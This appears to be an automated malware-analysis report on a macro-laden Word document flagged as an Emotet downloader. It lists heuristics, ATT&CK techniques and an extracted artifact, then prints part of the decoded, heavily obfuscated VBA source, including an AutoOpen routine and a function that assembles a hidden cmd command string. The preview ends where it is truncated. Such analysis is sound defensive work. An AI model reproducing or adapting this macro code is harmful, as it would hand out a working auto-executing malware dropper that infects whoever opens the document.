Verdict: MALICIOUS
Risk Score: 202

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File

Malware Insights
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The presence of an AutoOpen macro and the ClamAV detection signature 'Doc.Downloader.Emotet-6826437-0' strongly suggest this is a variant of the Emotet downloader. The VBA script is heavily obfuscated but its structure and the heuristic firings point to it being designed to download and execute a secondary payload.
Heuristics (6)
- ClamAV: Doc.Downloader.Emotet-6826437-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6826437-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 85757 bytes |

SHA-256 (macros.bas): e1356486685c3b26002fa7f1e1c1f6ece198f0f339148fe42ce8bc8705bf2633

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "HfdqmqU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim HqFUdr(1)
HqFUdr(0) = Left(AYKBHTUW + WWutpPFKlJPTfASwtMBM + oYoIwpTr, 598) + Right(zOBqPIjQ + FihVTCXZVKtCAMLwqYo + olRIiEU, 921)
Dim juGnf(1)
juGnf(0) = MidB(ZFLcELBz + VUqMQfAjkOnUBOYwKZfJt + mEkaQJh, 180, 981) + MidB(sTOGHwC + kKOfNkCVpLwNhtHUFGLCmu + iDShGMMw, 545, 803)
Dim wSfzTK(1)
wSfzTK(0) = Right(XqwKzoqJ + IJnntjGNFHvYQhjjwJrHNw + TUNYwJhS, 939) + MidB(YztGn + bSfcdAGPpRBarnsKhLmqw + iKhFCE, 328, 558)
Dim PqqMRT(2)
PqqMRT(0) = MidB(BvbRkOGN + YpbhsWwvJnzWAUvCw + rzwpsNZS, 984, 782) + MidB(EfKiw + VXkEoKivtLLftjzDRJWcKw + sqpmzVI, 890, 399) + MidB(IiNRpZod + YiiwuPzuaGBhlGNpXzLqh + DrjDWV, 839, 299) + MidB(HpCGb + hoGwcMvanXOMsVLoTqD + SQzmR, 221, 684)
PqqMRT(1) = MidB(lJtWc + klvhTBIHVjunbDwiMOJB + cJaiG, 961, 866) + MidB(iFIDp + hfvipcCjpZQbjhdr + jAXnJis, 570, 407) + Left(NEjdG + UjYCRYWsHVbZwYiXrfd + KpSkKk, 946) + MidB(PXKIdjws + lHubIodwisjqzAGKLHKsi + ORXvYwr, 841, 971)
OOwqwBZMknZO (KeyString(HunJQhi + LKrhcf + 17 + 13 + 37 + bkHnT + HEjBj) + rvpzL + VMbLNsHp + KeyString(hYUNUEs + jBMwd + 20 + 15 + 42 + FTwsi + PGYjb) + rldmM + hIWRsP + zCpiA + iHadfhVdNVX + UqBKqEut + zAAlbHOFFu + kpjKwvlVulj + JvjEwv + jNImGrh)
Dim aPQRja(1)
aPQRja(0) = Left(DJusw + bOzOiDMaiuAJlohNXAAwc + wvlJnh, 295) + MidB(suTzb + pnlaBWcdclaiUtJGQL + MkkawmzR, 732, 175)
Dim JquTZ(1)
JquTZ(0) = MidB(fKwop + ZZoUzGZYpQwRqjLAPIdzp + DkjQwvp, 411, 247) + MidB(RLblNSE + PSzzzWpSwZwoOQItVGwdH + GZivLun, 60, 390)
Dim jSZFUC(1)
jSZFUC(0) = Mid(icwXvwJL + SpsRPQrXkiLlEjqUQm + IDFJB, 659, 968) + Mid(GjBvsPC + dfjUTrCFNTrQkZcjGOIYi + EsWMU, 762, 220) + Mid(NjokN + rljsqwcTBrCbUYOmJiitf + aLvudzzS, 339, 762) + Right(NIQDC + IzpGiQVbNMrDMBVQXuDICT + Bitfba, 684)
End Sub
Attribute VB_Name = "lFMiIVBEFvvqM"
Function rldmM()
kwidliVWB = "d \/\\ \ //\/" + "\/ /V:ON/C" + """" + "set +'[{=7a20 07a" + "2 7a20 a720 a"
JcGVUClBuJz = "207 a702 2" + "07a a270 0a" + "27 072a 702a 7a20 20"
ZiBAwOr = "a7 02a7 a027" + " 07a2 70a2 270a}" + "a720}07a2{720ah7a0" + "2c20a7t70a2a" + "702aca702}a072;"
Dim YbMmY(1)
YbMmY(0) = Right(UaGSz + jwoAwDRHrlRnwQtNbB + dbYPS, 516) + Left(OEimik + wOGUVBHcFTqYkVlLZYblr + WNFLjVV, 51) + Left(uspbU + NGzoijQwZVdPDqfu + ZwUWTiEc, 933) + Mid(cSXkR + AWujvAjvipwwaYPiSKif + qRqCGflB, 760, 881)
Dim UmXGzw(2)
UmXGzw(0) = Left(jOHLkfzO + UMXPBctCJQvzWmTFbpRd + pvvrzq, 832) + Mid(micFlvM + uilPkYRuJdpDiSuLFFTZrYkE + UJPnVjZ, 688, 501) + Right(aCwiZl + JKZPOwqbtqAUZzOChzt + UbfCUrS, 752) + MidB(hVvuA + HUqjLBAbiKiBAQznQnGOaDz + tcEOLCrY, 386, 56)
UmXGzw(1) = Left(iOtIHE + RVHANsAGPfMkzdwXwJrf + NmYNFSz, 985) + MidB(YUEAkKq + XzoVUfLjBuapXoTmAz + XiVfZ, 908, 753)
Dim fhcdq(1)
fhcdq(0) = MidB(SAFsbUC + UpqjjqsjSlWnNdwzYro + rCHZdCS, 705, 365) + MidB(DkproTjt + EfBafzEEdjSFioPhABD + ccoGJ, 108, 140)
Dim chuDF(2)
chuDF(0) = MidB(LuWDRLUK + tvBhNjhjObtpaCYUUMP + BvufJfpS, 129, 72) + MidB(YpjGjt + QREvrwJpKwiFOjSYBZIn + zwMrOk, 368, 76)
chuDF(1) = MidB(krzoMV + wGjJJJOiUKBIjuAwEa + aprwbuM, 240, 602) + Mid(qfjomDd + wtNNFStMZoCGTRNnSV + VinmwFN, 872, 520)
OIqDvJvLN = "7a02k270aaa702e" + "270ar0a27ba027" + ";70a2Oa270j207a" + "P270a$07a2"
rldmM = kwidliVWB + JcGVUClBuJz + ZiBAwOr + OIqDvJvLN
Dim fjTERD(2)
fjTERD(0) = Right(CCNdK + XzKDTaThqCUQMmONGPcM + EbRwbrX, 320) + Right(RouQJM + OOjCuQQPwLUvlGbBoFziDwr + bzEtUrwp, 868)
fjTERD(1) = Mid(BfkcbFw + hTBKLHfkfFDwSsRAEmR + QAIVW, 70, 962) + MidB(nQIvti + jFNwiNUKinuQlptL + sjhIm, 170, 41) + Left(zjnsDM + mvuAMVzutAXXOBrYjos + NoiEK, 560) + MidB(QaHPD + LXIrPBjzMZrMnuzjmXmF + CwGfsH, 205, 833)
Dim DUmYvZ(2)
DUmYvZ(0) = MidB(miEDjbmX + qGkFjtczDzIjXPKfmmG + DmlzW, 70, 989) + Right(bKsFz + fTajAdzjkWbsujkFwHtGv + CENXtH, 492)
DUmYvZ(1) = Right(TjRAZ + MmjXlvZnWwlNifjbs + qPCFnM, 90) + Right(bGChTOj + JnjXKkCVBlTwwvRVfXiUw + i
... (truncated)